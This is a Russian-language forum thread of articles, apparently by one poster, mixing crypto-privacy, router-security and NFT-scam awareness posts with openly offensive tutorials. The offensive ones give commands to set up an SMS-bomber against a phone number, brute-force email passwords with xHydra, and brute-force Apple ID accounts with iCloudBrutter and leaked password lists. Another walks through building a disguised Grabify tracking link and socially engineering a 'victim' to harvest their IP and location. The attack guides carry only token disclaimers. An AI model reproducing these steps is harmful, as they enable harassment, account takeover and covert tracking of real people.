GhostX. Это своего рода обменник без посредников. Чтобы начать им пользоваться нужно только подключить свой криптокошелек. Обменять GHOST можно на 26 доступных криптовалют. Комиссия зависит от уровня загрузки сети.
Хотя существуют и другие сервисы для покупки и обмена криптовалюты GHOST, но они собирают больше данных о вас, а значит менее конфиденциальны.
Вывод
Ghost — это анонимная криптовалюта, в основе которой лежат Patrticl, который в свою очередь произошел от Биткоина. В отличие от аналогов, в ней используются технологии Proof-of-Stake, RingCT и Dandelion++, а так же Ghost Pay, который работает с Telegram.
BlackMAST
14.07.2022, 18:16
https://i.gyazo.com/24ddb5297623a1f8e71460aa1af735eb.jpg
Вступить в наш чат
Кто бы мог подумать, что такое устройство как Wi-Fi-роутер может стать серьёзной угрозой для вашей личной безопасности. Большинство людей пренебрегают защитой беспроводных маршрутизаторов, потому что недооценивают возможный вред, который может нанести злоумышленик, взломав ваше соединение. В этой статье вы узнаете чем это опасно и найдете простые способы защиты роутера.
https://i.gyazo.com/dc1581e1fdfa17ca1d63fc7b42629677.jpg
Что случится, если ваш роутер взломают?
Перехват паролей и других данных, которые вы передаёте по сети;
Заражение компьютера вредоносным ПО;
Слежка за вашей активностью в сети;
Блокировка Интернет-соединения;
Доступ к веб-камерам;
Использование вашего соединения для совершения преступной деятельности.
И многое другое…
Взлом роутера – это настоящая угроза для любого пользователя со серьёзными последствиями. Но не стоит впадать в панику, ведь «спасение утопающих – дело рук самих утопающих», и сейчас мы поделимся с вами способами защиты от подобных атак.
Как защитить роутер от хакеров
Измените учетные данные администратора роутера
Учетные данные администратора по умолчанию находятся в общем доступе для всех пользователей. Если вы никогда не обновляете учетные данные для входа в систему после получения роутера, вас можно считать легкой добычей для хакеров, потому мы настоятельно рекомендуем устанавливать надёжный пароль. Для этого:
Откройте браузер и введите в адресную строку цифры 192.168.0.1. Если ничего не произошло, попробуйте 192.168.1.1 и 10.0.0.1. Далее выскочит окно с полями для логина и пароля.
Введите логин admin и пароль admin. Если не подошли — посмотрите стандартный пароль в инструкции к роутеру или на его корпусе.
Найдите на странице ссылку с надписью Wi-Fi или Wireless. Откроется вкладка, где вы сможете изменить пароль.
Включите WPA2 (защищенный доступ Wi-Fi)
Это самый безопасный на сегодняшний день протокол шифрования. В сочетании с надёжным паролем он даст вам прочную защиту. Вы также можете встретить его другой вариант - это WPA-PSK.
https://i.gyazo.com/eab87ea1c22eff731a0a9c2c11d6c015.jpg
Правильный протокол шифрования не менее важен, чем пароль. Например, устаревший протокол WEP может быть с лёгкостью взломан за пару часов.
Измените сетевое имя вашего роутера (SSID)
Во время настройки роутера также не забудьте изменить SSID. Чтобы хакеры не смогли узнать ваш тип роутера, установите свое собственное сетевое имя. Шифрование WPA использует SSID как часть алгоритма, поэтому избегайте имён по умолчанию, так вы сделаете свою сеть более устойчивой к разным видам взлома.
Отключите WPS
На большинстве роутеров есть WPS (защищенная настройка Wi-Fi), что означает, вы можете нажать кнопку и ввести PIN-код для подключения вместо привычного пароля. Возможно, для кого-то такая функция является очень удобной, но мы не советуем использовать PIN-код вместо пароля. Ведь одним нажатием кнопки WPS, любой сможет подключиться к сети.
К сожалению, не все роутеры поддерживают деактивацию функций WPS, поэтому заранее позаботьтесь о том, чтобы у вашего роутера была такая функция.
Деактивируйте удаленный доступ
Проверьте, подключена ли функция удаленного администрирования на вашем роутере. Она позволяет входить в настройки администратора роутера из любой точки. Деактивировав эту функцию, вы повысите уровень защиты вашего соединения. Как узнать, что удалённый доступ подключён на вашем устройстве?Зайдите в веб-интерфейс и посмотрите, подходит ли стандартная учётная запись admin / admin, если да, то скорее измените пароль.
Заключение
Все выше написанные советы гарантированно обеспечат безопасность вашему Wi-Fi-роутеру, поэтому приступайте к их выполнению прямо сейчас. А в следующей части мы расскажем, как понять, что ваш роутер уже был взломан, и какие меры нужно принять в таком случае.
Удачи!
BlackMAST
20.07.2022, 13:13
https://i.gyazo.com/1a5ac89a15b03d586493f5f1ef822dac.jpg
Вступить в наш чат
С растущей популярностью NFT-токенов, набирают обороты разные способы мошенничества, которые становятся все изощреннее. Если вам кажется, что вы знаете о криптоскамерах все, то не спешите уходить, нам есть чем вас удивить.
https://i.gyazo.com/bc6e31e0def1f44b974ff676fcc7dc2a.png
Rug Pull
Схема мошенничества, при которой разработчики забрасывают проект, забирают деньги и уходят в закат. Как правило, разработчики выпускают новую коллекцию NFT, пускают все ресурсы на рекламу проекта и в̶е̶ш̶а̶ю̶т̶ ̶л̶а̶п̶ш̶у̶ ̶н̶а̶ ̶у̶ш̶и̶ красочно рассказывают о планах на развитие. По мере того, как проект набирает популярности среди инвесторов, скамеры удаляют соцсети и оставляют проект без поддержки. Как результат, пользователи, вложившие деньги, остаются с NFT, которые ничего не стоят. Зачастую участниками ****-проекта становятся, ничего не подозревающие, медийные персоны. Для того чтобы привлечь внимание к проекту проводятся различные розыгрыши и раздачи, которые вызывают у людей интерес к проекту. Приведем в пример Флойда Мейвезера, который рекламировал в своем Twitter такие проекты, как Bored Bunny, Ethereum Max, Moonshot.
На Frosties, одном из самых громких ****-проектов в США мошенники заработали 1 млн долларов. Они не выполнили обещаний и исчезли вместе с деньгами инвесторов.
Фишинг
Распространённый способ мошенничества, когда злоумышленники получают доступ к данным пользователей с помощью ссылок на поддельные сайты, имитирующих страницы известных криптопроектов.
Орудуют такие скамеры, как правило, в соцсетях, отправляя рассылки от имени известных NFT-проектов. В таких сообщениях содержатся завлекательные условия, например: скидка на покупку NFT. Однако, при переходе по ссылке, вы попадёте на фишинговый сайт, а при покупке, лишитесь средств со всего кошелька.
В числе жертв фишинговой атаки оказался популярный NFT-художник Beeple. Скамеры взломали его Twitter и разместили ссылку на фейковую коллекцию совместного NFT с Louis Vuitton. В итоге подписчики, решившие купить NFT, лишились денег, а мошенники получили ETH на сумму в 438 тысяч долларов.
Pump Dump
Манипуляция, которая позволяет повысить курс NFT с последующим обвалом цены. Скамеры всеми способами создают ажиотаж вокруг NFT для дальнейшего повышения цены токенов (памп). Затем стоимость токена обесценивается (дамп), и инвесторы теряют деньги.
Логан Пол, актер с 23 миллионами подписчиков на ютубе, стал еще одной медийной личностью, замеченной в продвижении мошеннических проектов. Ему удалось привлечь внимание к таким NFT, как Dink Doink NFT, Crypto Zoo, EMAX и Maverick. Так, их популярность вместе с ценой резко возрастали, а затем падали.
Фейковые коллекции
Мошенники подделывают коллекции известных NFT художников, а затем публикуют их на торговых площадках. Инвесторы думают, что покупают оригинал, а на самом деле это лишь фейк.
С помощью этого способа в апреле 2021 года мошенники умудрились продать коллекции, уже умершей на тот момент, художницы Qinni. Когда ее семья забыла тревогу, скамеры уже завладели кругленькой суммой денег доверяемых подписчиков.
Как не попасться
Внимательно проверяйте домен сайта, к которому подключается кошелек. Дабы не зайти на фишинговый сайт, сохраните в закладках реальные ссылки на площадки, которыми вы пользуетесь;
Если в соцсети какого-то проекта появляется выгодное предложение, не спешите покупать. Проверьте и другие источники, есть вероятность, что аккаунт был взломан хакерами;
Многообещающие предложения о дальнейшем развитии проекта также должны насторожить вас. Чтоб на попасться на схему Rug pull, отдавайте предпочтение проектам с реальными и хорошо распланированными целями;
Смотрите на показатель ликвидности. Высокий объем торгов указывает на то, что коллекция активно покупается и продаётся, а значит вы можете продать NFT на вторичном рынке.
С развитием NFT, появляются и новые способы мошенничества, но знания и умения распознать угрозу помогут вам сберечь средства. Здраво оценивайте все предложения и проверяйте интересующие проекты. Удачи!
BlackMAST
21.07.2022, 15:13
https://i.gyazo.com/582ac9f6b0860abcfa6e0bcbfd2b2560.jpg
Вступить в наш чат
В прошлой статье мы рассказали, как защитить свой роутер от хакеров, и чем опасен взлом. Но как понять, что ваша сеть стала уязвимой, и как вернуть над ней контроль? Обо всем по порядку.
Мы надеемся, что вы учли и предприняли все наши советы по безопасности роутера, но если вы всё-таки заметили подозрительную активность на вашем ПК или просто хотите убедиться, что с вашим Wi-Fi все в порядке, то советуем обратить внимание на следующие признаки, свидетельствующие о том, что вас хакнули.
https://i.gyazo.com/2f5bd3f233a1761c998811125a9db3bf.jpg
Как понять, что ваш роутер взломан:
В сети Wi-Fi появились новые устройства. Чтобы узнать, подключалось ли к сети неизвестное устройство, войдите в свой роутер и проверьте список IP-адресов в вашей сети на наличие иных подключений.
Изменились настройки DNS. Хакеры часто меняют настройки для подключения к вредоносным серверам, которые крадут ваши персональные данные и даже заражают устройство вирусами. Для того, чтобы узнать к какому серверу подключается ваш ПК, зайдите в DNS настройки вашего роутера в меню администратора.
Учетные данные администратора изменились. Если вы не можете подключиться к сети Wi-Fi, то логично предположить, что хакеры поменяли пароль и учетные данные вашего роутера, тем самым лишили вас доступа к Интернету.
Скорость интернета упала. Хотя причин этому очень много, но, если вы проверили все параметры, а скорость так и не увеличилась, то есть вероятность, что злоумышленник использует пропускную способность вашего Wi-Fi.
Вредоносное ПО. Наличие вируса - это повод бить тревогу. Если вы не могли самостоятельно подцепить вредоносную программу, то скорее всего кто-то это сделал за вас.
Если вы обнаружили на своём устройстве более 2-х вышеназванных пунктов, то ваш роутер скорее всего взломали.
Как вернуть контроль над устройством:
Выполнив следующие действия, вы не только избавитесь от хакеров, но и очистите свой компьютер от вредоносного ПО.
Выключите роутер
Первым действием требуется разорвать соединение между вашим устройством и хакером. Для этого отсоедините интернет-кабели и на время отключите все устройства, подключённые к Wi-Fi.
Сбросьте роутер до заводских настроек
Все роутеры оснащены специальной кнопкой сброса, вам, возможно, пригодится скрепка или иголка, чтобы нажать на нее.
Сброс к заводским настройкам удаляет все изменения параметров роутера, в том числе все сетевые настройки, которые были ранее установлены. Если злоумышленнику известен пароль и учетные данные администратора, то они станут недоступны после сброса.
Измените учетные данные администратора
После сброса восстановите заводские настройки по умолчанию. На самом роутере или в руководстве записаны логин и пароль для входа, используйте их. Однако, сразу же поменяйте их на сложную комбинацию букв и цифр, состоящих не менее чем из 15 символов, дабы избежать повторной атаки.
Установите SSID и пароль Wi-Fi
Помните, что сложные названия и пароли защищают вашу сеть от взлома.
Обновляйте прошивку
Не все роутеры автоматически обновляют прошивку, поэтому лично позаботьтесь об этом. Зайдите в меню администратора -> настройки прошивки и обновите ее до новейшей версии. Любые хакерские атаки, нацеленные на вашу старую прошивку, должны стать неэффективными. Раз в пару месяцев проверяйте наличие новых прошивок и обновляйте их.
В дальнейшем любые атаки на ваш роутер станут неэффективными.
Удачи!
BlackMAST
09.08.2022, 23:31
https://i.gyazo.com/3ca8c5f7a695aefafdf499bb5683fce1.jpg
Вступить в наш чат
Сегодня мы расскажем вам о карманной альтернативе Linux на iOS, и как с помощью неё устроить бомбер атаку всего за 5 минут.
iSH Shell- это приложение в AppStore, которое может стать полноценным эмулятором линукс на вашем яблочном гаджете.
Первым делом заходим в AppStore и скачиваем программу iSH Shell.
https://i.gyazo.com/9029f3288da9a75fe71fb34cf78736ca.jpg
Открываем приложение и начинаем по отдельности вводить команды.
Обновим в терминале список пакетов:
apk update
https://i.gyazo.com/446d4fc0703c9d8ab50cb779a42e2c2f.jpg
apk upgrade
apk add git
Для работы смс-бомбера потребуется python:
apk add python
apk add python3
Так же pip3:
apk add py3-pip
Далее установим requests и colorama:
pip3 install requests
pip3 install colorama
После загрузки вышеуказанных компонентов, перейдем к самому бомберу:
git clonehttps://github.com/termux-lab/smsham.git
Когда скрипт завершит установку, запускаем его:
cd smsham
python3 smsham.py
Готово. Теперь вас попросят ввести номер телефона. Вводим и подтверждаем с помощью enter.
Чтобы остановить работу бомбера, нажмите ctrl + z.
Заключение
iSH Shell - настоящая находка для карманного хакинга на вашем apple устройстве. При желании вы можете найти большое количество применений для данной программы, которые не будут уступать Linux. В следующей же части вы узнаете, как с помощью iSH cделать DDoS атаку.
Удачи!
Вся вышеизложенная информация предоставлена в ознакомительных целях. Мы не призываем к действию.
BlackMAST
09.08.2022, 23:31
https://i.gyazo.com/0c69f3aa76e620c843bfe0a8b1ecf8bc.jpg
Вступить в наш чат
Когда речь заходит про криптовалюту, мнения единогласно сходятся в том, что самым безопасным способом её хранения является холодный кошелёк. В любой системе хранения, работающей через Интернет, может случиться сбой, именно поэтому холодные кошельки так пользуются популярностью. Сегодня мы наглядно расскажем, как можно создать свой холодный кошелек для криптовалюты, используя USB-накопитель и Tails.
https://i.gyazo.com/bf26b27871c584fe258d0bd706148681.jpg
Холодный кошелёк хранит ваш закрытый ключ и другие данные без использования Интернета, что и делает его более надёжным.
К холодному способу хранения относятся аппаратные кошельки, например Ledger и Trezor, но их главный минус - это цена. Не все готовы платить по 15000 тысяч рублей, поэтому обычный USB-накопитель может стать достойной альтернативой.
Почему Linux
В отличие от Windows, Linux имеет более продуманную систему безопасности. В Windows то и дело встречаются шпионское модули, вирусы, кейлогеры, а на сервера Microsoft пересылаются скриншоты, которые вы никак не можете отключить. Если вы точно хотите обеспечить себе максимальную анонимность, то обязательно устанавливайте холодный кошелёк на Linux.
Почему Tails
Tails является дистрибутивом Linux и по умолчанию использует сеть Tor. Помимо этого, там уже установлен кошелек Electrum, который нам и потребуется для работы.
Что нам понадобится
два USB-накопителя;
Скаченный дистрибутив Tails (Скачивайте с официального сайта);
Программа Rufus для записи Linux на USB (не используйте другие программы для записи Linux, только Rufus).
Установка
Итак, на первую флешку загружаем Tails и затем вставляем вторую.
Заходим в меню и выбираем Tails Installer.
https://i.gyazo.com/13841d8a206e949528dfd663cb6d5acf.jpg
Выберите клонирование Tails и загрузите на вторую флешку.
https://i.gyazo.com/83ec16e3c311c57c915dfa304b05434a.jpg
Создание USB с Tails для хранения данных
Если вы просто запишите Tails на USB, то вы не сможете хранить вашу личную информацию. Для этого нам и нужен второй USB-накопитель.
Откройте меню и нажмите Configure persistent volume (Настройка хранилища данных)
https://i.gyazo.com/e6dc4be8f48848eb83888ea483125b2e.jpg
С помощью бегунка выберите те данные, которые вам понадобятся.
https://i.gyazo.com/2ea45a27ce7d773eb45b2bd857bffa0d.jpg
Создание ключей и настройка Electrum
Прежде всего, кошельку необходимо присвоить имя. Если у вас есть стандартный кошелек с двухфакторной аутентификацией, мультиподписью или предварительно подготовленный кошелек, вы можете импортировать его.
Мы же будем создавать стандартный кошелек.
https://i.gyazo.com/1fcfceef1deea3e94c4a7c856f2195f5.png
https://i.gyazo.com/5014c9c4dc1fe26b4d1b76cae2406b96.png
Создадим новый сид. Это алгоритм, который генерирует список из 12 слов — закрытый ключ. Слова необходимо записать по порядку, хранить в надежном месте и никому никогда не сообщать.
https://i.gyazo.com/4c3afbc9333b4f830a61d329ad59fa02.png
https://i.gyazo.com/e2fc28dca9ed822aa45910dc93b396bf.png
Теперь введём данные слова по порядку, после чего будет запрошен пароль для повторного шифрования кошелька.
https://i.gyazo.com/9653661e26ec478e5f4ae0226af87232.png
Чтобы посмотреть публичный ключ и другую информацию о кошельке, зайдите во вкладку Информация о кошельке.
https://i.gyazo.com/213515e1ff9d69774807684f3e3ab13d.png
Ваш кошелёк Electrum готов. Для других криптовалют необходимо использовать разные кошельки, которые вы таким же способом можете скачивать и устанавливать в систему.
Удачи!
BlackMAST
11.08.2022, 22:01
https://i.gyazo.com/a3389eb46882b2190e03817600bbb932.jpg
Вступить в наш чат
В наши дни почта - это не просто самостоятельный инструмент, а скорее ключевое звено, которое даёт доступ ко всем сервисам, социальным сетям и многому другому. Взломав почту, вы получите доступ ко всему. В сегодняшней статье мы поговорим про отнюдь не новый, но действенный способ взлома паролей. Он является универсальным и может быть применён ко всем почтовым сервисам. Речь пойдет про ***** в Kali Linux.
https://i.gyazo.com/1a6deb54a7d0cc2089a060e84fd15dfa.jpg
xHydra - это многозадачный брутфорсер паролей с открытым исходным кодом, с помощью которого мы подберем пароль для одной тестовой почты. Это бесплатное приложение, которое можно скачать с GitHub. Но если вы знакомы с Kali Linux,то вам известно, что ***** является встроенным инструментом, поэтому установку выполнять не нужно.
Взлом почты
1. Запускаем графическую оболочку скрипта xhydra.
2. В новом окне, во вкладке «Target» прописываем в строке «Single Target» адрес smtp-сервера исходящей почты нужного сервиса. Порт 465 и протокол выбираем соответственно SMTP. Ставим галочку использовать SSL-соединение. И отмечаем пункт, отвечающий за отображение результатов брутфорса в реальном времени.
https://i.gyazo.com/2470b7180b95c903de6e95a089e5e81b.png
3. В соседней вкладке «Password» указываем почту, которую будем брутфорсить. В пункте Password указываем путь к словарю. Найти словари для брутфорса можно в любом поисковике. Также ставим отметку, отвечающую за проверку логина в качестве возможного пароля.
https://i.gyazo.com/360e3c8da059f8c7715153aece12563f.png
4. В «Tuning»меняем метод на HTTP.
5. Во вкладке «Specific» пишем полной адрес почтового сервиса, где находится наш ящик.
https://i.gyazo.com/238b53966c30474137b028588967f5a1.png
6. Жмём на «Start». Перебор паролей запущен. Если брут успешный, то программа выдаст сообщение о том, что пароль подобран, как в нашем случае.
https://i.gyazo.com/f0a60c943e6751f5e4c279ccd33b7af1.png
А ваша почта надёжно защищена?
Информация в этой статье предоставлена в ознакомительных целях. Мы не призываем к действию.
BlackMAST
24.08.2022, 16:14
https://i.gyazo.com/20c387f0dc063473cb019d6fe97d2898.jpg
Вступить в наш чат
Метаданные — данные, относящиеся к дополнительной информации о содержимом или объекте. Метаданные раскрывают сведения о признаках и свойствах, позволяющие автоматически искать и управлять ими в больших информационных потоках.
Как работают метаданные
Например, вы хотите скинуть фото на форум. Однако помимо фото, интернет получит много интересной информации о вас: когда был сделан снимок, а также данные GPS, по которым без труда можно вычислить местоположение. Особенно интересно, если фото было сделано из вашего дома.
https://i.gyazo.com/2b1270ba884292242c60e11e8338f0f3.png
Как вы понимаете, метаданные содержат огромное множество информации о вас. Для того, чтобы обеспечить свою безопасность и оставаться анонимным в сети, необходимо удалять метаданные. В этой статье разберём способ их удаления.
https://i.gyazo.com/d6ea2ba35d9297bf22b06fb7fa197fdf.png
Как удалить метаданные
Проще всего: скачать специальное приложение. Таких приложений становится всё больше. В этой статье разберём одно из самых популярных — Metadata Cleaner.
Metadata Cleaner позволяет просматривать метаданные в ваших файлах и удалять их. Устанавливаем приложение, интерфейс интуитивно понятен.
Добавляем файлы
https://i.gyazo.com/5a74b6130038254c689ca9f924d5c452.png
2. Приложение позволяет просматривать, какие метаданные содержит файл.
https://i.gyazo.com/adb62dbba3b33fead92c304e902b1d24.png
3. Удаляем метаданные. Можно сразу у всех файлов.
https://i.gyazo.com/ce43a5f0922c2c526c4420514a6e271e.png
BlackMAST
25.08.2022, 16:44
https://i.gyazo.com/1153ae5a4f5a82ac79a1f43daab40f16.jpg
Вступить в наш чат
Согласно CNBC, в 2021 году в Метавселенной было продано недвижимости на $501 млн, а в 2022 году продажи превысили $85 млн. При таком дальнейшем спросе они превысят $1 млд к концу года. Это лишний раз доказывает, что Метавселенная находится на пике популярности, вместе с этим она развивается и появляются новые тренды, такие как Интернет тела и взламываемые люди.
Всего пару лет назад основатель ВЭФ К. Шваб заявил, что благодаря Метавселенной человек сможет достичь слияния на физическом, биологическом и цифровом уровне. А в прошлом году Марк Цукерберг сказал, что в скором времени нейроинтерфейсы станут обязательной частью взаимодействия человека с Метавселенной, появятся новые устройства, позволяющие полностью погрузится в процесс и сделать его более живым и естественным.
https://i.gyazo.com/4c175f2244b01bd026b718dc7309d81a.jpg
Интернет тела
Речь идёт о «Интернет телах» (IoB) - это технология, которая позволяет совершать действия при помощи мыслей, памяти. Интернет тела способны объединить тело человека с датчиками, которые передают информацию по сетям. Они включают в себя медицинские и биометрические данные.
Нейронные интерфейсы будут очень важной частью AR-очков, или EMG-вход от мыши на запястье будет сочетаться с ИИ.
Благодаря Интернет телу человеку откроются огромные возможности, которые помогут полностью погрузится в цифровое пространство. За счёт накопления биометрических данных в Метавселенных через какое-то время можно будет взламывать и программировать человеческое тело.
Хакинг людей в Метавселенной
Еще в 2020 году историк Юваль Харари отметил, что человек больше не является загадкой природы, он становится животном, которого можно взломать. И для того, чтобы хакнуть человека нужно завладеть только его биологическими данными и соответствующей вычислительной мощностью.
Харари представил формулу, которая может послужить основой для будущего взламывания человека. Вот эта формула — B x C x D = A**. Она означает, что биологические знания, умноженные на вычислительную мощность, умноженную на данные, равны способности взламывать людей. Харари уверен, в скором времени правительство и компании начнут взламывать население, так как уже имеют большую базу данных о каждом из нас. И в этом процессе Метавселенные могут стать тем самым инструментом для хакинга. Чем больше людей подключатся к Метавселенным, тем больше информации можно собрать. А чем больше устройств, тем больше возможностей открываются для тех, кто собирает и управляет ими.
Время Интернет тел и взламывания уже наступило. Бесчисленное количество устройств собирает данные о пользователях. Например, медицинские учреждения, они хранят огромные базы данных о состоянии здоровья пациентов. Клиники уже сталкиваются с попытками взлома и похищения информации. Нет никаких гарантий, что хакеры могут работать на правительства разных стран, которым нужен доступ к таким базам данным.
Учитывая тот факт, что уже некоторые клиники открывают офисы в Метавселенных, количество поступаемой информации о клиентах вырастет в разы. Они могут быть использованы в самых разных целях, в том числе и для хакинга.
При слиянии на биологическом, цифровом и физическом уровне, навигация по Метавселенной потребует от каждого обладать личным аватаром, чтобы войти в систему. Контроль за ним будет осуществлять система, а не сам человек.
Заключение
Метавселенные дают уникальные возможности для творчества, работы, развлечений. Однако, они же и собирают о пользователях множество данных, которые могут быть использованы против самого человека.
BlackMAST
05.09.2022, 19:47
https://i.gyazo.com/f007ba127e66d2af08056ce791b3471e.jpg
Вступить в наш чат
Если вы хотите отследить чьё-то местоположение, собрать данные о пользователе, то это статья для вас. Сегодня мы покажем вам, как это можно провернуть с помощью простой ссылки.
Для того, чтобы создать шпионскую ссылку, мы будем использовать сайт Grabify. Перейдя по ней, сайт автоматически соберет о жертве личные данные, в том числе и IP.
https://i.gyazo.com/630cbdce7080012a0ce6838b9ea903d0.png
Самое важное в этом деле - выбрать правдоподобную ссылку, по которой человек точно захочет перейти. Это может быть видео с ютуба или мемная картинка, нет никаких ограничений. Какую ссылку вы выберете, зависит от вас. Вам лишь нужно подобрать что-то убедительное и подходящее к конкретной ситуации.
Создание шпионской ссылки
Шаг 1 - Подготовка
Откройте веб-браузер и перейдите на сайт grabify.link.
Этот сайт бесплатный, поэтому платить ни за что не нужно.
Шаг 2 - Создаем учетную запись Grabify
Создайте учетную запись на Grabify. Вы также можете использовать временную почту, если хотите. Пройдите регистрацию и подтвердите ее в сообщении, отправленном по почте.
https://i.gyazo.com/a7d4fa50b1c25734bccdb1aebe2041d1.jpg
После того, как вошли в учётную запись, вы должны увидеть страницу, как показано ниже.
https://i.gyazo.com/657b37cd167de900b8366ca478bc9e93.jpg
Шаг 3 - Создаём URL для отслеживания
https://i.gyazo.com/47a2b494ea74c40fa6c50899b77b032a.jpg
В начале статьи мы попросили вас хорошенько подумать насчёт убедительной ссылки, по которой жертва 100% захочет перейти. Будьте креативными.
Примечание: это должно быть что-то простое и не должно вызывать подозрений.
Помимо этого, обязательно выберите опцию «Smart Logger», это поможет собрать еще больше информации о пользователе.
https://i.gyazo.com/1f900557ee50ed9bb0200b4438ed438b.jpg
Шаг 4 - Скрываем ссылку для отслеживания
Название Grabify в имени URL-адреса может показаться подозрительным, поэтому убедитесь, что вы используете функцию сокращения. Вы можете использовать ссылку с любым количеством сокращателей URL, которые доступны прямо в Grabify, как показано ниже.
https://i.gyazo.com/598bbaa061c5686933e3d450e218d380.jpg
Если сокращатели по умолчанию не соответствуют вашим потребностям, вы всегда можете создать собственную ссылку с помощью пользовательской панели ссылок, как показано ниже.
https://i.gyazo.com/9b29ab12c1b46067e3364b8849881f3e.jpg
Нажмите либо на «Click here», либо на «Change domain/Make a custom link» в поле «New URL». Теперь проверьте параметры «Extension» в открывшемся меню.
https://i.gyazo.com/7f223cb8d09afac8445cbef4811d1c7e.jpg
Шаг 5 - Отправляем ссылку
Есть много вариантов, как это можно сделать. Самый распространенный — отправить ссылку в социальных сетях или мессенджерах. Используйте социальную инженерию, чтобы убедить человека нажать на неё.
Как только цель нажимает на ссылку, вы получаете информацию о IP-адресе и другие личные данные, такие как дата и время, местоположение, информация о батарее, язык, часовой пояс, разрешение экрана, браузер, интернет-провайдер и операционная система.
Поздравляем, вы успешно научились отслеживать чье-либо местоположение с помощью одной лишь ссылки. Успехов!
BlackMAST
07.09.2022, 11:33
https://i.gyazo.com/306ba48e0b8a8667ff3ef372ca7a55b8.jpg
Вирусы, они везде
Рассказываем в нашей авторской статье - возможно ли поймать вирус, сканируя QR-код.
Как проверить QR-код на вирусы
Вступить в наш чат
Каждый знает, что нельзя переходить по левым ссылкам в интернете. Для того, чтобы поймать вирус иногда достаточно просто попасть на сайт. Причём порой даже официальные адекватные сайты могут быть взломаны. Многие опытные пользователи уже давно не переходят по подозрительным ссылкам и не важно, где они наткнулись на них: письмо на почте, кто-то скинул в лс, увидели на форуме или даже пришло смс на мобильный телефон. Но что насчёт QR-кодов? В данной статье узнаем, как проверить QR-код на наличие вирусов.
Интересно, что люди легко сканируют любые QR-коды так, словно к ним больше доверия. Однако, QR-код — та же самая ссылка только в другом виде. Она точно так же может нести в себе угрозу.
QR-коды теперь повсюду. К сожалению, QR-коды могут быть не такими безопасными, как вы думаете, особенно потому, что URL-адреса скрыты, и почти невозможно сказать, куда они вас приведут, если вы их отсканируете.
Вы можете узнать, безопасен ли QR-код, прежде чем получить к нему доступ.Как проверить QR-код
Проверить QR-код поможет сервис RevealQR.
Плюсы:
1. Простая и быстрая регистрация, можно зайти через аккаунт Google
2. В сервис можно загрузить как уже сделанное фото, так и сделать в режиме онлайнКак работает сервис
RevealQR декодирует URL-адрес, хранящийся в QR-коде, и отправляет его на ведущую платформу анализа вредоносных программ VirusTotal.
https://i.gyazo.com/3ac8cd6769e0e46f224e5c6aeb354bae.png
Всё просто:
Регистрируемся
Сканируем код
Получаем информацию о QR-коде
https://i.gyazo.com/de47e6b214089ba4df74419e3beebce9.png
Однако, стоит помнить, что ни один сервис не даст 100% информации. Даже если сервис не считал код опасным, следует быть осторжным.
BlackMAST
12.09.2022, 18:28
https://i.gyazo.com/cfcf24c82f48e603ebfef11b7e7ac011.jpg
Вступить в наш чат
Apple — крупнейшая компания, спускающая миллиарды долларов на защиту и конфиденциальность своих устройств. Однако, времена изменились, и поэтому яблочные устройства все чаще подвергаются хакерским атакам. Так, ещё в 2019 году Google’s Project Zero сообщили о массовых взломах Apple устройств: для этого были использованы вредоносные сайты, перейдя по которым, устройство взламывалось. В сегодняшней статье мы расскажем вам, как хакнуть Apple ID, и как пользователям яблок защититься от взломов.
https://i.gyazo.com/f13424ee8ba7b3539c1f5cea35e3989a.jpg
Что такое Apple ID
Apple ID представляет из себя учетную запись, которая даёт доступ ко всем функция Apple. По сути, это центр управления всем устройством, который позволяет вам удаленно управлять IPhone, загружать и обновлять программное обеспечение, создавать резервные копии данных, искать и блокировать устройство и многое другое.
Как взломать Apple ID
Для того, чтобы хакнуть Apple ID, мы будем использовать инструмент iCloudBrutter. Это простой скрипт Python для выполнения атаки методом перебора паролей.
Вся информация предоставлена в ознакомительных целях. Мы не несём ответственности за ваши действия.
Итак, начнём:
Клонируйте инструмент iCloudBrutter с помощью команды git-clone:
git clone https://github.com/m4ll0k/iCloudBrutter.git
Теперь также измените каталог на icloudbuster:
cd iCloudBrutter
Чтобы использовать этот инструмент, вам также необходимо установить следующее:
pip3 install requests, urllib3, socks
Если pip3 не установлен, используйте следующую команду для его установки:
sudo apt-get install python3 python3-pip php ssh git
Теперь, чтобы запустить инструмент и начать взламывать учетные записи Apple ID, введите следующее:
python3 icloud.
https://i.gyazo.com/8a17021fa4fce2befe04677611c2a97d.jpg
Далее пишем последнюю команду:
python3 icloud.py --idw /root/Desktop/Apple.txt --wordlist /root/Desktop/pass.txt
https://i.gyazo.com/a6846038d6c4969c3742710c3ae7bd2c.jpg
Здесь apple.txt содержит учётные записи Apple, а pass.txt — список часто используемых паролей и тех, которые сливаются в сеть хакерами. Вы легко можете найти и скачать такие списки в Интернете, просто введите запрос: «passwords for bruteforce».
Вывод
Метод взлома с помощью брутфорса не является 100% рабочим, так как успех будет гарантирован лишь в том случае, когда пользователь установит слабый пароль. Подводя итог, хотелось бы отметить, что единственной защитой от взломов неизменно остаётся надёжный пароль. Именно уникальный и сильный пароль - это гарант безопасности ваших личный данных. Удачи!
BlackMAST
15.09.2022, 21:19
https://i.gyazo.com/e6d6209f286d31cea2c4f6b7dd01657d.jpg
Вступить в наш чат
Что обычному человеку хорошо, то хакеру –– смерть. Очевидно, что требования разных пользователей к компьютеру сильно разнятся. Но самое сильное отличие - это операционная система. Большинство хакеров скептически относятся к Windows поскольку считают ее медленной, неудобной и совсем небезопасной по сравнению с другими системами. И именно поэтому, мы подготовили для вас наш топ-5 лучших ОС для хакеров.
1. Kali Linux
Kali Linux — это программное обеспечение с открытым исходным кодом, которое доступно абсолютно бесплатно. Хакеры отдают предпочтение этой ОС, потому что она имеет более 600 инструментов тестирования проникновения и большое количество поддерживаемых языков. Поскольку это программное обеспечение с открытым исходным кодом, весь его код доступен на GitHub для настройки. Некоторые функции Kali Linux: Wifite2, Nessus, Aircrack-ng, Netcat, инструменты судебной экспертизы, NetHunter и многие другие.
2. BackBox
https://i.gyazo.com/15b8c23a38549193caa45d4b90c4cf59.jpg
BackBox — это проект сообщества с открытым исходным кодом, который продвигает культуру безопасности в ИТ-среде и делает ее лучше и безопаснее. Это дистрибутив Linux для тестирования на проникновение на основе Ubuntu. Многие хакеры предпочитают BackBox любой другой ОС, потому что в ней есть инструменты безопасности для самых разных целей, таких как анализ сети, анализ веб-приложений, компьютерный криминалистический анализ, оценка уязвимостей и т. д.
3. Parrot Security OS
https://i.gyazo.com/ed8b5e7a32d2ef0c4f2668c7a066478f.jpg
